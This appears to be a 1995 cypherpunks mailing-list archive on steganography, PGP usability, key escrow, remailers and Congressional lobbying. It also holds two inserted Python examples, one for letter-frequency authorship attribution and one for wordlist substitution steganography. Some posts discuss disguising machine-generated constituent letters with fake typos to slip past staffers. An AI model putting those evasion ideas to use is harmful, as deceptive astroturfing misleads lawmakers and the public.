Misdirection. This has nothing to do with my point. The staffers will
STILL toss your stuff.

> PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts.
> 
>   Meanwhile, back at the ranch.

In other words, you are choosing to ignore me. Regardless of whether
you are paying attention, however, you will still not be able to
alter the facts of life in Washington.

> .. If one of our DC members can set up an
> Imail-FAX gateway, we can publicize some nifty Iddresses for folx to

Perhaps people who can be bothered to spell out "folks" properly also
are willing to write letters that will be paid attention to. As you
seem to prefer to ignore the fact that you will be ignored, why are
you willing to spend effort setting up an "Imail[sic]-FAX gateway"?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 19 Jul 95 04:51:23 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <9507191128.AA18103@snark.imsi.com>
Message-ID: <Pine.SOL.3.91.950719074121.5161G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


FWIW:

The Christian Science Monitor ran an article a week or so ago, reporting
that Congressional mail loads have doubled in the last three years, that 
it's inconvenient to deal with all that mail, and nobody is paying any 
attention to their mail any more.

I've never had a meaningful response from any of my (non-) representatives.

Representative government, hah!

bd

On Wed, 19 Jul 1995, Perry E. Metzger wrote:

> 
> MONTY HARDER writes:
> > PE> would be discerned by a staffer in moments. Crap like this is called
> > 
> >   They should know, because they send form letters to constituents all
> > the time, only they don't bother to vary it a bit.
> 
> Misdirection. This has nothing to do with my point. The staffers will
> STILL toss your stuff.
> 
> > PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts.
> > 
> >   Meanwhile, back at the ranch.
> 
> In other words, you are choosing to ignore me. Regardless of whether
> you are paying attention, however, you will still not be able to
> alter the facts of life in Washington.
> 
> > .. If one of our DC members can set up an
> > Imail-FAX gateway, we can publicize some nifty Iddresses for folx to
> 
> Perhaps people who can be bothered to spell out "folks" properly also
> are willing to write letters that will be paid attention to. As you
> seem to prefer to ignore the fact that you will be ignored, why are
> you willing to spend effort setting up an "Imail[sic]-FAX gateway"?
> 
> .pm
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 19 Jul 95 04:58:10 PDT
To: cypherpunks@toad.com
Subject: Re: Automatic Rant generator
Message-ID: <199507191158.HAA20377@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Jonathon Blake <wd803@freenet.victoria.bc.ca> writes:

[ Various words of Tim May, Martin Hamilton, Monty Harder, Harry
  Bartholomew, and myself elided. ]

[ Re: plotters and Metafonts: ]
>
>    Making the little problem Tim presents, a major headache for 
>    somebody else --- handwriting analysts.
>...
>    Actually, True Type fonts of your handwriting are available, 
>    for any platform that accepts that font type.
>

It needs to be more complicated than this, however, because if just a
font is used then each 'e' looks like every other--easy to detect.

>    Tim May > Of course this is also similar to the "style
>    Tim May > detectors" we so  often talk about.
>
>    I don't remember the program name, but there is software 
>    available now, that analyzes a document, and figures out who 
>    wrote it --- based on the frequency count of the letters of 
>    the alphabet.  Secondary measures are frequency counts of 
>    letter pairs.  Words, phrases, sentences etc are totally 
>    ignored.  So what you'd need to do here, to pass your pseudo- 
>    Turing Test is a program that generates different statistical 
>    results, for allegedly different people.   

Interesting.  I've not heard of this.  The situation bears a great
similarity to stego--you need to emulate a statistical pattern to
make it undetectable, and if your opponent's statistics are more
sophisticated than yours, you'll be found out.

[ Re: Introducing simulated spelling and typographical errors: ]
>
>    Actually, the usual give away, is in letter and letter pair 
>    frequencies --- not spelling mistakes, grammatical errors, 
>    etc.
>
>    However, there is a technique called _Scientific Content 
>    ANalysis_ that looks at how things are said, to judge their 
>    "truthfulness."  A good program will not show that the text 
>    was randomly generated, nor show that the author is off-the- 
>    wall, so to speak.

Then again, what are the chances that Congressional staffers will be
using such sophisticated methods to sort out the 'astroturf'?  If
a staffer is suspicious but then sees "recieved" and "I been" and
"heplful" and decides, "Okay, this was written by a human," well,
that's Good Enough for Government Work, as they say.

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.
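
The letter and letter-pair frequency comparison described in the quoted text above, as an added example (not code from any poster, and not the unnamed program mentioned). Function names, the L1 distance and the sample letters are assumptions made for illustration; it also shows that transposition typos such as "recieved" leave the letter frequencies untouched and move only the letter-pair frequencies.

```python
import re
from collections import Counter


def profile(text):
    """Relative frequencies of letters and of letter pairs inside words.

    Word order, phrases and sentences are ignored, as in the description.
    """
    words = re.findall(r"[a-z]+", text.lower())
    letters = Counter(ch for w in words for ch in w)
    pairs = Counter(w[i:i + 2] for w in words for i in range(len(w) - 1))

    def normalise(counts):
        total = sum(counts.values())
        return {k: v / total for k, v in counts.items()} if total else {}

    return normalise(letters), normalise(pairs)


def _l1(p, q):
    """L1 distance between two frequency tables (0.0 identical, 2.0 disjoint)."""
    return sum(abs(p.get(k, 0.0) - q.get(k, 0.0)) for k in set(p) | set(q))


def distance(a, b, pair_weight=0.5):
    """Weighted mix of the letter distance and the letter-pair distance."""
    (la, pa), (lb, pb) = profile(a), profile(b)
    return (1 - pair_weight) * _l1(la, lb) + pair_weight * _l1(pa, pb)


def attribute(unknown, samples):
    """Return (closest author, all scores) for a text of unknown origin."""
    scores = {name: distance(unknown, text) for name, text in samples.items()}
    return min(scores, key=scores.get), scores


def reorder_words(text):
    """Same words in a different order: invisible to this kind of analysis."""
    return " ".join(sorted(text.split()))


# Constructed sample letters, one per hypothetical author.
SAMPLES = {
    "constituent_a": "Please oppose the bill because it would ban strong "
                     "encryption for ordinary citizens",
    "constituent_b": "Folx should fax their congresscritters and tell them "
                     "to quit messing with the net",
}

# Constructed pair: the second line has two transposition typos.
CLEAN = "I received your helpful letter"
TYPOS = "I recieved your heplful letter"

if __name__ == "__main__":
    who, scores = attribute(reorder_words(SAMPLES["constituent_a"]), SAMPLES)
    print(who, scores)
    print("letter profile unchanged by typos:",
          profile(CLEAN)[0] == profile(TYPOS)[0])
    print("distance clean vs typos:", distance(CLEAN, TYPOS))
```
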




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Wed, 19 Jul 95 06:16:28 PDT
To: cypherpunks@toad.com
Subject: RE: Stego-Rants ?
Message-ID: <9507191316.AA14859@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Which of the following is the cleartext?
> 1. Bit and byte dropout can significantly impede communication.
> 2. Flower and shrub planting can greatly enhance landscaping.
> 3. Word and phrase substitution can hopelessly disguise meaning.
> 4. UFO and space-alien belief can seriously damage credibility.
> If you *presume* my context, you easily identify (3).  If only the wordlists 
> that translate between (1), (2) and (4) were available for your inspection, 
> you would be up the creek but you wouldn't know it.
> Yes, this is aba's "exxon" at work again, and yes, it seems to me that 
> deniability through other-plausible-meaning is viable as a form of stego.  
> Grammatical correctness is easy to maintain, and care in choosing words can 
> preserve much apparent meaning.
> Bolivar

This class of code is fairly old. In 'The Codebreakers' an incident 
is recounted (I think from WW2). A suspected spy in the US was sent
a cable from overseas, reading 'Our father is dead'. This was 
intercepted, and the censors, suspecting a stego'd message, 
substituted 'Our father is deceased'.

The suspected spy immediately sent back 'Is father dead or deceased?', 
and was arrested. 

The book contains many fascinating stories of stego and attempted 
stego, including mailed knitting patterns, crossword puzzles, 
drawings, sports statistics, etc.

On the eve of Pearl Harbour, the wife of a Japanese diplomat in Oahu
sent a long message to Japan describing in detail the many kinds of
flowers blooming at that time in Hawaii. It was sent through 
non-diplomatic channels, and authorities suspecting it contained 
stego, failed to deliver it. After the war it came out that she did
regular gardening columns for a Japanese magazine, and the message 
was entirely innocent.




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com
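
The wordlist substitution from the "Stego-Rants" post and the censor's synonym rewrite from the cable anecdote above, as one added example (not code from either poster). The wordlists are constructed from the four sentences quoted in the thread; the function names and the censor's synonym table are assumptions for illustration.

```python
import re

# Constructed wordlists, one entry per content word of the four sentences
# quoted in the post; index i in every list fills the same slot.
CLEAR = ["word", "phrase", "substitution", "hopelessly", "disguise", "meaning"]
COVERS = {
    "bits":   ["bit", "byte", "dropout", "significantly", "impede",
               "communication"],
    "garden": ["flower", "shrub", "planting", "greatly", "enhance",
               "landscaping"],
    "ufo":    ["UFO", "space-alien", "belief", "seriously", "damage",
               "credibility"],
}
TOKEN = re.compile(r"[A-Za-z]+(?:-[A-Za-z]+)*")


def _match_case(src, dst):
    """Carry sentence-initial capitalisation over; keep acronyms like UFO."""
    if dst != dst.lower():
        return dst
    return dst.capitalize() if src[:1].isupper() else dst


def translate(text, table):
    """Replace every token found in `table` (lower-case keys); keep the rest."""
    def swap(match):
        tok = match.group(0)
        dst = table.get(tok.lower())
        return _match_case(tok, dst) if dst is not None else tok
    return TOKEN.sub(swap, text)


def encode(cleartext, cover):
    """Cleartext -> innocuous-looking sentence in the chosen cover wordlist."""
    return translate(cleartext, dict(zip(CLEAR, COVERS[cover])))


def decode(covertext, cover):
    """Inverse mapping; only works while the exact codewords survive."""
    table = {w.lower(): c for w, c in zip(COVERS[cover], CLEAR)}
    return translate(covertext, table)


def codewords_present(covertext, cover):
    """How many of the cover list's codewords can still be found."""
    known = {w.lower() for w in COVERS[cover]}
    return sum(tok.lower() in known for tok in TOKEN.findall(covertext))


# The censor's move from the anecdote: same meaning, different words.
# Constructed synonym table standing in for a human paraphrase.
CENSOR_SYNONYMS = {"greatly": "vastly", "enhance": "improve"}


def censor(text):
    return translate(text, CENSOR_SYNONYMS)


if __name__ == "__main__":
    clear = "Word and phrase substitution can hopelessly disguise meaning."
    sent = encode(clear, "garden")
    delivered = censor(sent)
    print(sent)
    print(delivered)
    # The innocent reading is unchanged, but two codewords are gone and the
    # decoded text no longer matches what was sent.
    print(decode(delivered, "garden"), codewords_present(delivered, "garden"))
```
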




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 19 Jul 95 09:14:53 PDT
To: "Douglas B. Renner" <cypherpunks@toad.com
Subject: Re: Stego-Rants ?
Message-ID: <ac327d250c021004491e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:57 AM 7/19/95, Douglas B. Renner wrote:
>Just a few thoughts:
>
>1. Use the randomness in a computer generated piece of English text to
>hold your real message, encrypted, and obscured.
>
>2. Even more entertaining would be if the foreground text could somehow
>be contrived to be meaningful. I know this would be a "good trick" but
>I'd conjecture that it's possible.  Imagine fractal compression of a text
>file, with the decompression routine adding some "randomness" which would
>be your message, obscured at a very abstract level.  Depending on how
>much "randomness" was added, I'm wondering if the resulting text might
>possibly retain some of its original legibility (?)  I am assuming that
>a companion fractal re-compressing routine would be required to retrieve
>the cypher.
>
>(I am looking at an ad for a graphics program, "Images Incorporated" by
>Iterated Systems which with fractal techniques can achieve 100:1
>compression -- and then -- decompress to 8 times the original bitmap size
>with minimal added distortion.)

But fractal compression schemes are usually _lossy_, that is, some of the
original bits are irretrievably lost. (This should be clear also from the
amount of compression achieved....multiple files/images compress to the
"same" smaller file--by the "pigeonhole principle.")

Lossy compression is often OK for visual images and audible files, a la
music, but would be pretty bad for any scheme dependent on encryption.

(Not totally out of the question, as error correction could be used to
maybe construct the critical bits, but then there's a messy battle going
on between lossy compression to get more bit density and adding bits for
error correction...)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Wed, 19 Jul 95 07:25:22 PDT
To: cypherpunks@toad.com
Subject: Secure Courier and Amex Card
Message-ID: <199507191425.JAA14052@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




   Mountain View, Ca., July 18 -- With the support of Intuit
   and MasterCard International, Netscape Communications has
   announced Secure Courier, an open, cross-platform digital
   envelope. The new protocol allows secure transfer of credit
   card, debit card and micro-transactions across the
   Internet.

   Secure Courier is an open, cross-platform protocol, meaning
   it will operate in Macintosh, Windows, and Unix operating
   environments common to Internet traffic. Specifications for
   this new protocol are currently available from Netscape's
   World Wide Web site at

      http://home.netscape.com/newsref/std/credit.html .

   _________________________________________________________


   New York, NY, July 18 -- American Express' Travel Related
   Services Company said it is establishing relationships with
   four technology companies for secure Internet credit card
   transactions using the American Express card and the Optima
   card.

   The four companies involved, CyberCash, First Virtual
   Holdings, Netscape Communications Corporation, and Open
   Market, have different ways of securing transactions over
   The Internet's World Wide Web.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 19 Jul 95 06:57:47 PDT
To: cypherpunks@toad.com
Subject: Re:       RE: Stego-Rants ?
Message-ID: <9507191352.AA20325@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> From: "Peter Trei" <trei@toad.com>
> The book contains many fascinating stories of stego and attempted 
> stego, including mailed knitting patterns ...

It was the best of times, it was the worst of times.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 19 Jul 95 10:04:39 PDT
To: cypherpunks@toad.com
Subject: cypherpunk "Zen" victories
Message-ID: <199507191703.KAA20332@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I was recently marvelling at how much the "cypherpunk agenda"
is being advanced even in light of what would seem to be setbacks.
Particularly in the area of anonymous remailers. We now have a very
major article on remailers and Julf's setup in the NYT that portrays
them in an unbiased, unhysteria-stricken mode. Also in the article,
it quotes the police as regretting their falling victim to
Scientology manipulation and investigating the remailer "without
cause". A major officer is quoted as saying, roughly, "we are
going to need a crime before we investigate in the future". 

Look what we got out of this: 

1) incredible positive publicity for Julf,
Hero of the Net 

2) introduction of the concept of anonymous remailers
to the layman 

3) police awareness. increased reluctance to go on anonymous remailer
witchhunts. advice to other police to do the same.

4) only *one* address was compromised on Julf's system. a small price
to pay for all this

5) Time Magazine also did an article on Julf a few months ago and
this compromise in identity. *astonishing* publicity.

All in all, I would say the effect was an overall "net positive".
It reminds me of a zen-like saying, "sometimes you lose by winning
and win by losing". It would seem on the face of it that the
Helsingius Affair was a debacle from the point of view of pseudonymity.
However I would consider it an extraordinary success. 

The major foes of pseudonymity have so far been misguided police forces 
in Finland, who now say they resent the solicitude of the US into their own
affairs, and would not be so eager to cooperate in the future;
another foe is a radical religious cult that is finding its own
set of 20th century heretics, and attempting to excommunicate them.
In the meantime, with each exposure, the idea of anonymity and
pseudonymity is gaining powerful friends.

Also, a long time ago a major foe of anonymity was Dick Depew. An
article came out on him in the WSJ that made him look awfully
silly.  He is roundly considered one of the more legendary net
crackpots today. 

===

I'd also like to point out that the recent Rimm job affair is
another "net positive" for the net. Rimm has been so utterly
thoroughly discredited and blackened by his own personality
and background, as reported by Brock Meeks recently, it is 
amazingly hilarious. Rimm has become the laughingstock of
cyberspace in the way that Canter and Siegel were.

We could not have asked for a better setup for embarrassing
and humiliating the media into realizing the core issues
involving pornography on the internet. If someone did this
intentionally, it would have been considered a brilliant
trap. Time and DeWitt have been savaged by very reputable people, and 
I'm sure they consider the article a fiasco from a credibility standpoint.
Any magazine that covers pornography in cyberspace in the future
will be very gunshy and will not be so flippant, if they can
stand poking the hornet's nest at all.

===

Another area is in the bills that are being introduced in congress.
It would seem these are a fiasco from the point of view of
those interested in cyberspace. But there are backlashes even
in congress. Was it Markey that introduced a bill that made
cyberspace off limits to future draconian legislation? All this
also forces legislators to figure out what the hell they are dealing
with, and they are finding out what their own authority in the 
matter is. I think the wise ones may figure out that if they
don't play nice, we may take our marbles away and go play with
someone else. D.Frissell said something profound in his letter
to the editor, "Congress thinks the Internet can be controlled.
We who built it, and continue to build it, think it cannot be.
It will be interesting to see who is right". His comparing it
with the ideas in the declaration of independence, that "when
a government no longer serves the people, they have a right to
overthrow it", is extremely apropos in cyberspace, where it
may be more possible than ever for those who desire freedom
to make those who are opposed to it, completely irrelevant.

T.May suggests that we just give up the fight in congress, saying
that bills can be introduced faster than we can fight them. I
agree with the observation but not the conclusion. 
Bills have a very hard time getting to be law.
They are very fragile in initial stages, and at these points they
can indeed be killed with a little pressure in the right spots.
We are learning where those spots are.

At this point I think it is not in the interests of those promoting
cyberspace to try to evade congress. So far, it has not proved itself
to be completely hostile to the point of trying to shut down cyberspace
to the degree it does not fit its own agenda. And as long as they
are not outright enemies, some could be turned into powerful
promoters. The idea of abandoning educating/influencing congress 
entirely seems like a kind of unhealthy nihilism to me. There are
allies in congress and there are people listening there. Their 
unawareness seems amazingly proportional to the cluelessness of
the general population about cyberspace (and I see extremely
encouraging signs both are rapidly diminishing).

The bills seem to be becoming more desperate and draconian in their
language. This is a sign of fear and dread on the side that seeks
to regulate bits. They are in a tricky position, because the more
draconian the language, the less likely it is to be passed and
taken seriously. People become suspicious and hypersensitive to
the infractions. To a large degree, many parts in the government
only gain their power through secrecy. As people become more aware
of the power flow, they disrupt and seize it themselves. Every bill
that has more desperate language is the other side revealing
their secret agenda, to control thought, which I think reasonable 
people are increasingly considering and recognizing as bogus
and bankrupt.

Congress will eventually polarize into being generally promoting
of cyberspace, or outrightly hostile to it. Cyberspace will
inevitably escape its grip if congress goes in this direction. To use
Zen analogies again, there is the idea that water is the most
powerful force on the earth, because it simply flows around
that which opposes it. I find that cyberspace is wholly analogous.
In fact it seems to me that cyberspace would give Lao Tzu
a whole new cuttingly apt metaphor for his philosophies!!

===

So the next time that you rant about how some bill or another
means the Death of the Net, or the police investigating a remailer
means the downfall of cryptoanarchy, or a lousy article with a
zillion distortions comes out, think again. The greatest cypherpunk
victories are emerging through what would appear at first to be the 
"blackest" moments.

viva la cryptoanarchy!!!


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 19 Jul 95 07:23:36 PDT
To: cypherpunks@toad.com
Subject: Re: Commercenet document on cryptography
Message-ID: <9507191417.AA20396@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>   http://www.commerce.net/information/position/position.062695.html

Thanks to Steven for mentioning this -- it's a great paper.  Send it to
your gov't representatives.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Wed, 19 Jul 95 11:02:15 PDT
To: cypherpunks@toad.com
Subject: Government Mandated Keys
Message-ID: <9507191802.AA21406@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I want to register the 1-bit key of "1".  I expect to 
send about half my message bits encrypted, the rest will be 
clear-text.
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Wed, 19 Jul 95 11:37:46 PDT
To: cypherpunks@toad.com
Subject: Re: Government Mandated Keys
Message-ID: <199507191836.LAA18289@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 7/19/95 PDT, rick hoselton wrote:
>I want to register the 1-bit key of "1".  I expect to 
>send about half my message bits encrypted, the rest will be clear-text.

Oh, go ahead, register 0 also.  You'll probably want to switch keys
occasionally during sessions.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 19 Jul 95 10:44:59 PDT
To: cypherpunks@toad.com
Subject: "Hey Phil!  Stop telling people *not* to use PGP!"  (plus: "help me with my PGP problems!")
Message-ID: <199507191744.LAA04117@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[I posted the following to alt.security.pgp and sci.crypt.  -Bryce]


(If you don't want to help with my problems, skip to "Zimmermann needs to 
change pgpdoc1.txt" at the end.)


First, I am trying to communicate with a fellow who refuses to upgrade to
PGP2.6 because if RSA (as opposed to RSAREF) was good enough for Phil
then it's good enough for him!  Assuming for the moment that convincing
him to upgrade is not feasible, isn't there a hack by which I can interoperate
with him?  He's using 2.3a and I'm using 2.6ui, 2.6.2, 2.6.1 and 2.6.
(More on that later...)
  I can hack the C code if that is what is necessary to interoperate.


Second, I am using several public keys and several different versions of
PGP because I work from various computers with various levels of security.
That is: when I am in the University's computer lab I use one key <617C6DB9>
and the University's 2.6.2 but when I am on my home computer I use another
<148A11E5> and my linux PGP 2.6.1 (I'm going to upgrade it any day now...).
I also have a couple of other keys with "Bryce Wilcox" in the User ID field
for other uses.
  The problem/gripe is that whenever I try to manipulate public keys on
my keyring, PGP grabs the first one with User ID "Bryce".  How do I extract,
edit, sign, etc. the *other* "Bryce" keys on my public keyring?  I tried
giving PGP the Key ID, which seemed like the most reasonable user interface
to me, but that didn't work.


Third, how do I set those "PGP-Note" strings that appear in some people's
PGP Signature Blocks?



And lastly, a gripe.  Zimmermann's "pgpdoc1.txt" needs to be changed.

Let me explain:  I am in the (long, drawn-out) process of trying to convince
my friends and family members to use PGP.  The first hurdle is that it is
a pain in the butt to use, and they are not going to use it if it means they
have to learn a handful of Unix commands and spend 30 seconds screwing with
it every time they want to send mail.  But that isn't the subject of this
gripe.

  The second hurdle manifests when I send them a copy of "pgpdoc1.txt".  They
start browsing through it and come upon "NEVER EVER use PGP on a remote,
multi-user system.  It wouldn't have maximum security in that situation."
  They say "Oh, well I guess I can't use it then because damned if I'm going
to upload and download all of my mail at 1200 baud just so Bryce will quit 
bugging me about this PGP thing."
  So I say "No no no, using it on a remote system is still better than
nothing.  Just be aware that it is easier to crack your secret key when
you use it there than if you kept it on your home computer."

  So they go back to reading "pgpdoc1.txt" and it says "NEVER EVER use a
public key which was sent to you through the Net.  It could be tampered with."
  So they say, "What, I have to make a long-distance phone call to Cousin Joe
in Israel before I can send him a 'Happy Birthday' message using PGP?  Why
bother?"
  And I say "No no no, using a key which you got through the Net is better 
than using no key at all, just be aware that if someone *really* wanted
to spy on you that they could have tampered with it.  When you see Cousin
Joe next Christmas you can compare keys with him and make sure you have the
right one."

In short, pgpdoc1.txt needs to quit saying "NEVER EVER use PGP in other than
MAXIMAL SECURITY situations" and start saying "If you want MAXIMAL security,
do it this way, and if you are satisfied with lesser security, here are
other options."



I am fond of saying that we PGP enthusiasts have two choices ahead of us
within a couple of years:  either 5,000 enthusiasts using PGP with
MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL
SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with
push-button interfaces and multi-user remote systems.


The important thing, of course, is the easy-to-use, e-mail-integrated
software (version 3.0, I hope?), but it would also help if Zimmermann's
PGP Doc didn't tell those computer-illiterates to either "become enthusiasts
or don't use it."


Bryce
signatures follow

    /=============------------             URL of the Day:  DigiCash bv
     Bryce Wilcox,  Programmer       The currency of the future!  Give me a
     bryce.wilcox@colorado.edu       cyberbuck because I gave you this URL:
     ------------=============/              http://www.digicash.com/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Wed, 19 Jul 95 10:27:12 PDT
To: trei@process.com
Subject: RE: Stego-Rants ?
Message-ID: <Chameleon.4.01.2.950719122621.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:

>> Which of the following is the cleartext?
>> 1. Bit and byte dropout can significantly impede communication.
>> 2. Flower and shrub planting can greatly enhance landscaping.
>> 3. Word and phrase substitution can hopelessly disguise meaning.
>> 4. UFO and space-alien belief can seriously damage credibility.
>> (deletia)
>> Bolivar
>
>This class of code is fairly old. 

Thank you.  I would never have suspected.  I grew up in Heinlein's barrel, 
fed through a hole in the side, until I was 18.

>(deletia)
>The suspected spy immediately sent back 'Is father dead or deceased?', 
>and was arrested. 
>
>The book contains many fascinating stories of stego and attempted 
>stego, including mailed knitting patterns, crossword puzzles, 
>drawings, sports statistics, etc.
>(deletia)

(shrug).  The point is not whether people have used this before, or how cute 
the anecdotes of wartime failures or detections.  The point is that everyone 
uses language in innumerable explainable contexts, and that we have computers 
with which to effortlessly transform text into other text.  There is no need 
to knit, or invent crossword matrices, concoct drawings, or fabricate 
verifiable sports statistics.  With word substitution, anything can mean 
anything.  I never suggested it take the place of encryption, or that I 
thought it a new form of stego.  

The implications may be new in the context of ubiquitous high-speed computers 
and electronic communication, in that the evidentiary value of written 
language can be shown to be so malleable as to be useless.  For example, how 
would you like to have to ascribe particular meaning to the accumulated notes 
and files of someone who collects "exxon" wordlists?  Virtually anything you 
process against any of the wordlists will change into something equally as 
interesting (or uninteresting) as the original.  The presence in a system of 
wordlists tends to reduce the content of natural language files in that 
system to examples of sentence structure.  As an example of just how 
malleable sentence structure templates can be, the defense in such a case 
might convert the prosecution's charging document into a glowing commendation 
of the defendant, suitably introduced through an expert witness.

Bolivar
(who hopes to retire when he finishes school)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 19 Jul 95 09:21:13 PDT
To: ericande@linknet.kitsap.lib.wa.us (Eric Anderson)
Subject: Re: Govt mandated key
In-Reply-To: <Pine.SUN.3.91.950718221833.16687A-100000@linknet.kitsap.lib.wa.us>
Message-ID: <9507191620.AA22218@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I wouldn't register my keys and I don't think ANY of us should either.
| If they threatened me W/ RICO, I would probably register *A* key but 
| certainly not one I EVER intended to actually use.
| In a case like this I think massive civil disobedience would be a good 
| response.

	Registering 2^128 keys is just as good a form of civil
disobedience as refusing to co-operate.  Who was it that said the best
remedy to a bad law is for it to be strictly enforced?

	I think after I register my 2^128 keys (in random order, of
course), I shall from time to time request copies of particular keys
to ensure that they are keeping mine on file.  Actually, I think I can
reasonably be expected to use both IDEA and 3DES, so I shall also
register 2^196 3DES keys.  To simplify the government's indexing of
these keys, one could also generate key identifiers to identify
each message with on the outside.  These unrelated numbers would
double or triple the number of bits that would have to be stored.

	Storing or transmitting them might be a bit of a problem, but
I'll expect government assistance in finding a storage medium that can
hold more bits than the number of atoms in the universe.

Adam

-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 19 Jul 95 10:26:42 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: TINSIGN:  Simple script for PGP signing messages in Tin 1.22
Message-ID: <Pine.ULT.3.91.950719122403.1187B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Howdy, me again.  In keeping with my wish to make PGP signing of 
transmissions simple and commonplace, I've got another script for y'all.  
This is for the Tin Newsreader.

I hope you find it useful.

Comments appreciated.

============================================================

#!/bin/sh

# TinSign v1.0
# Written by Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# Based in part on the PGP editor wrapper, Version 1.0 (editpgp)
# Copyright (c) 1994, Mark Lewis <nostra@city.ac.uk>.

# TINSIGN is a simple program that will allow you to automatically sign
# your news messages composed with the TIN 1.2pl2 news reader.  It
# may also work with other news programs, but it has not been tested.

# INSTRUCTIONS FOR CONFIGURING TIN
#
# You need to define the following options in Tin.  This is done via 
# editing the $HOME/.tin/tinrc file.
#
#	A)	start_editor_offset=ON
#	B)	default_editor_format=<path to this script> +%N %F
#		Example:  /users/foo/bar/tinsign +%N %F
#	C)	default_sigfile=/dev/null
#		NOTE:  	I have been unable to get my copy of tin to read 
#			any file other than $HOME/.signature, no matter
#			what this parameter is set to.  The solution I 
#			found was to remove $HOME/.signature and create
#			another file that is read in by defining the
#			variable below.  You may want to experiment with
#			this to find out what works best for you as this 
#			might be a bug specific to our local compilation.

# INSTRUCTIONS FOR CONFIGURING TINSIGN
#
# The PGP program must be in your path, and the PGPPATH environment
# variable must be defined.  See the PGP documentation for details.
#
# In addition to PGP and the editor you define, TinSign also will use the 
# following programs:
#	awk
#	cat
#	echo
#	egrep
#	mv
#	rm
#	sleep
#
# Double check that the first line of this program points to sh.
#
# Execute the command "chmod 700 <path/to/tinsign>".
#
